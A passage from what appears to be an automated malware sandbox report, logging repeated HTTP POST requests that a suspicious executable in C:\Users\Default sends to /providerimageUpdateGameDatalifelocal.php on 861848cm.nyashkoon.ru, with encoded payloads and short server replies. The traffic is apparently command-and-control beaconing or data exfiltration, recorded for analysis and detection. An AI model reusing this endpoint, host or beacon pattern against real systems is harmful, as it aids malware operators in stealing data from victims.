                                                                                            Nov 5, 2024 23:53:00.807709932 CET158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:52:58 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            32192.168.2.44978437.44.238.250802212C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:53:00.947052002 CET333OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:53:01.305496931 CET1024OUTData Raw: 56 53 5a 5a 56 5c 55 58 5a 5f 52 51 54 5c 5b 59 55 51 59 56 51 50 52 5b 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: VSZZV\UXZ_RQT\[YUQYVQPR[TRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%,/&V(+<<04=:=[=087"?V(.4-/#Q"X2'X$.Q->
                                                                                            Nov 5, 2024 23:53:01.759044886 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:53:01.831165075 CET158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:52:59 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            33192.168.2.44978937.44.238.250802212C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:53:02.175106049 CET333OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:53:02.524265051 CET1024OUTData Raw: 53 55 5a 5e 56 5a 50 5d 5a 5f 52 51 54 59 5b 5f 55 54 59 5a 51 53 52 5f 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: SUZ^VZP]Z_RQTY[_UTYZQSR_TRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%_/<-?(<#7)*=[*_3^4^ "V+=+-<#'.19'X$.Q-*


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            34192.168.2.44979237.44.238.250802212C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:53:02.702539921 CET333OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1264
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:53:03.055535078 CET1264OUTData Raw: 53 52 5a 5f 56 56 55 5f 5a 5f 52 51 54 52 5b 5b 55 56 59 5f 51 53 52 59 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: SRZ_VVU_Z_RQTR[[UVY_QSRYTRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY&;%<^ \+3<[)9>>-^'[7<= .%<]#7>2'X$.Q-
                                                                                            Nov 5, 2024 23:53:03.523082018 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:53:03.594216108 CET308INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:53:01 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 152
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 00 1e 23 00 3c 3a 2e 58 33 2b 05 0b 29 10 29 58 28 09 3f 5e 3b 54 28 12 2a 23 02 11 3d 06 33 08 20 59 30 00 23 22 03 10 37 32 2c 02 3c 3b 21 5f 05 1d 39 5f 24 29 24 1f 3e 31 3a 16 28 27 0e 42 31 09 3b 1c 2a 3b 00 59 23 14 36 54 25 2e 25 12 26 32 27 51 2b 42 35 17 39 3c 2f 55 25 2a 2a 57 09 16 23 08 33 33 01 5e 29 31 2f 10 24 2e 3e 03 31 04 33 57 3e 02 2f 58 23 37 25 07 2a 33 05 58 36 34 3e 5a 24 2a 2a 40 31 2e 28 08 29 22 26 55 22 0d 20 54 01 30 5d 4f
                                                                                            Data Ascii: #<:.X3+))X(?^;T(*#=3 Y0#"72,<;!_9_$)$>1:('B1;*;Y#6T%.%&2'Q+B59</U%**W#33^)1/$.>13W>/X#7%*3X64>Z$**@1.()"&U" T0]O


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            35192.168.2.44979337.44.238.250802212C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:53:02.836927891 CET333OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:53:03.196155071 CET1024OUTData Raw: 53 53 5f 59 56 57 50 5f 5a 5f 52 51 54 53 5b 5b 55 52 59 5c 51 50 52 5e 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: SS_YVWP_Z_RQTS[[URY\QPR^TRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY&;?8<3(])%[=3#?*W<Y.%(Y#&]&'X$.Q-
                                                                                            Nov 5, 2024 23:53:03.664726019 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:53:03.744987011 CET158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:53:01 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            36192.168.2.44979937.44.238.250802212C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:53:03.872970104 CET309OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Nov 5, 2024 23:53:04.227560043 CET1024OUTData Raw: 56 57 5f 59 56 58 55 59 5a 5f 52 51 54 5f 5b 5e 55 57 59 58 51 51 52 52 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: VW_YVXUYZ_RQT_[^UWYXQQRRTRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%/?+34Y)?>"Z08 7/>V?>Z-,_!72%'X$.Q-2
                                                                                            Nov 5, 2024 23:53:04.682724953 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:53:04.758843899 CET158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:53:02 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            37192.168.2.44980537.44.238.250802212C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:53:04.892666101 CET309OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1016
                                                                                            Expect: 100-continue
                                                                                            Nov 5, 2024 23:53:05.242994070 CET1016OUTData Raw: 56 53 5f 5c 53 5c 50 5e 5a 5f 52 51 54 5a 5b 58 55 57 59 56 51 53 52 58 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: VS_\S\P^Z_RQTZ[XUWYVQSRXTRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY&/<+$<3>:!*%$(4#<>(-4.&$ '"&9'X$.Q-.
                                                                                            Nov 5, 2024 23:53:05.735794067 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:53:05.813324928 CET158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:53:03 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            38192.168.2.44981337.44.238.250802212C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:53:05.948481083 CET333OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:53:06.305485010 CET1024OUTData Raw: 53 55 5a 5f 56 5a 55 59 5a 5f 52 51 54 5b 5b 5b 55 51 59 58 51 5f 52 52 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: SUZ_VZUYZ_RQT[[[UQYXQ_RRTRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%X/?&=;$\(<])*="_08^#,=+:( >X%)'X$.Q-"
                                                                                            Nov 5, 2024 23:53:06.790745974 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:53:06.869643927 CET158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:53:04 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            39192.168.2.44981837.44.238.250802212C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:53:07.422339916 CET333OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:53:07.774241924 CET1024OUTData Raw: 53 54 5a 5c 56 5b 55 59 5a 5f 52 51 54 5b 5b 5a 55 53 59 5f 51 55 52 52 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: STZ\V[UYZ_RQT[[ZUSY_QURRTRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY&/<"T<^ Y+ ***6^0(#<&?.5 #&_%9'X$.Q-"
                                                                                            Nov 5, 2024 23:53:08.239286900 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:53:08.310966969 CET158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:53:06 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            40192.168.2.44982737.44.238.250802212C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:53:08.440433979 CET333OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            41192.168.2.44983037.44.238.250802212C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:53:08.611149073 CET333OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1264
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:53:08.961719990 CET1264OUTData Raw: 56 5e 5a 5c 56 5d 55 58 5a 5f 52 51 54 5b 5b 53 55 57 59 58 51 5e 52 52 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: V^Z\V]UXZ_RQT[[SUWYXQ^RRTRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY&/?)(4Y?3;=:">'<4(?[934'_&)'X$.Q-"
                                                                                            Nov 5, 2024 23:53:09.420377016 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:53:09.490633965 CET308INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:53:07 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 152
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 00 1e 20 5e 3f 39 35 03 26 3b 23 0c 3d 3e 3d 12 28 20 01 19 2f 32 28 5b 29 1d 3b 03 3d 38 02 54 34 3f 0d 5e 22 1c 31 5d 34 21 3b 5f 28 01 21 5f 05 1d 39 11 27 07 23 0e 2a 0c 29 01 3e 19 27 1b 25 30 23 18 28 38 2d 05 37 39 2a 57 24 2e 0b 5d 31 0c 24 09 3f 34 25 18 2e 01 09 55 27 2a 2a 57 09 16 20 12 33 33 27 5f 29 08 27 10 25 2e 3e 03 26 2a 3c 0e 3e 2c 20 00 34 27 3d 04 29 33 05 5e 36 27 26 5d 33 2a 08 43 25 2d 33 19 2b 08 26 55 22 0d 20 54 01 30 5d 4f
                                                                                            Data Ascii: ^?95&;#=>=( /2([);=8T4?^"1]4!;_(!_9'#*)>'%0#(8-79*W$.]1$?4%.U'**W 33'_)'%.>&*<>, 4'=)3^6'&]3*C%-3+&U" T0]O


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            42192.168.2.44983137.44.238.250802212C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:53:08.736589909 CET333OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:53:09.086726904 CET1024OUTData Raw: 56 56 5a 5b 56 5a 50 59 5a 5f 52 51 54 59 5b 58 55 54 59 5e 51 5f 52 5f 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: VVZ[VZPYZ_RQTY[XUTY^Q_R_TRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%,*((3<+**-Z=-.38?#!?>,- 7Q22'X$.Q-*
                                                                                            Nov 5, 2024 23:53:09.550338984 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:53:09.626386881 CET158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:53:07 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            43192.168.2.44983737.44.238.250802212C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:53:10.080252886 CET309OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Nov 5, 2024 23:53:10.430583954 CET1024OUTData Raw: 56 56 5a 55 56 5d 50 5b 5a 5f 52 51 54 5c 5b 5b 55 57 59 5f 51 51 52 52 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: VVZUV]P[Z_RQT\[[UWY_QQRRTRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY&,2?;'?#):![?-"^'8"?Q+X#\9+ '.%'X$.Q->
                                                                                            Nov 5, 2024 23:53:10.899797916 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:53:10.976063967 CET158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:53:08 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            44192.168.2.44984337.44.238.250802212C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:53:11.107933044 CET333OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:53:11.461736917 CET1024OUTData Raw: 56 51 5a 55 56 57 50 5e 5a 5f 52 51 54 53 5b 5b 55 5d 59 5f 51 50 52 5c 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: VQZUVWP^Z_RQTS[[U]Y_QPR\TRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%_-,*V(8(?08*1[>.[$Y"?&?'Z.Y!'=1'X$.Q-
                                                                                            Nov 5, 2024 23:53:11.911993027 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:53:11.991229057 CET158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:53:09 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            45192.168.2.44985137.44.238.250802212C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:53:12.712198973 CET333OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:53:13.071161032 CET1024OUTData Raw: 56 55 5f 5b 56 5a 50 53 5a 5f 52 51 54 53 5b 5f 55 53 59 5f 51 56 52 5c 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: VU_[VZPSZ_RQTS[_USY_QVR\TRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%];>=(]+#*91Z)=%;4_#/!(-0-0 1&'X$.Q-
                                                                                            Nov 5, 2024 23:53:13.542640924 CET25INHTTP/1.1 100 Continue
